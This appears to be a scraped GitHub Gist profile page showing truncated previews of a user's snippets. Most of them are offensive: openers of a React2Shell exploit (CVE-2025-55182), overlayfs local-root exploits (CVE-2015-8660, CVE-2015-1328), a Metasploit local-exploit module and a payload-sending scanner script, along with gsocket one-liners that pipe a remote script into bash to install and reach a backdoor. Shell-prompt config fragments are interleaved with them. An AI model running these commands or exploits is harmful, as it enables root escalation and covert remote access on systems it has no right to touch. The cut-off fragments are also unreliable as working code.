Skip to content

Instantly share code, notes, and snippets.

View spynika's full-sized avatar
😶
I may be slow to respond.

bjorkon spynika

😶
I may be slow to respond.
View GitHub Profile
// CVE-2025-55182 - React2Shell Exploit
// Educational purposes only - Use at your own risk
const FormDataLib = require('form-data');
// Payload generators
function createBasicPayload() {
return {
'0': '$1',
'1': {
{
"$schema": "https://github.com/fastfetch-cli/fastfetch/raw/dev/doc/json_schema.json",
"logo": {
"source": "/home/haxor/.config/fastfetch/pngs/0day.png",
"height": 18
},
"display": {
"separator": " : "
},
"modules": [
# See this wiki page for more info:
# https://github.com/dylanaraps/neofetch/wiki/Customizing-Info
print_info() {
prin "$(color 1)┌────────────────────────✪─────────────────────────┐"
prin "$(color 2) upgrade your skill for your protection,$(color 3) haxor here"
prin "$(color 1)└────────────────────────✪─────────────────────────┘"
@spynika
spynika / over5.c
Last active January 17, 2026 04:10
/*
just another overlayfs exploit, works on kernels before 2015-12-26
# Exploit Title: overlayfs local root
# Date: 2016-01-05
# Exploit Author: rebel
# Version: Ubuntu 14.04 LTS, 15.10 and more
# Tested on: Ubuntu 14.04 LTS, 15.10
# CVE : CVE-2015-8660
Install
bash -c "$(curl -fsSL https://gsocket.io/y)"
Uninstall
GS_UNDO=1 bash -c "$(curl -fsSL https://gsocket.io/y)"
Access
S="ExampleSecretChangeMe" bash -c "$(curl -fsSL https://gsocket.io/y)"
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
#!/usr/bin/env python3
import requests
import argparse
from colorama import init, Fore, Style
import re
import sys
init(autoreset=True)
parser = argparse.ArgumentParser(description="Send payload & detect vuln")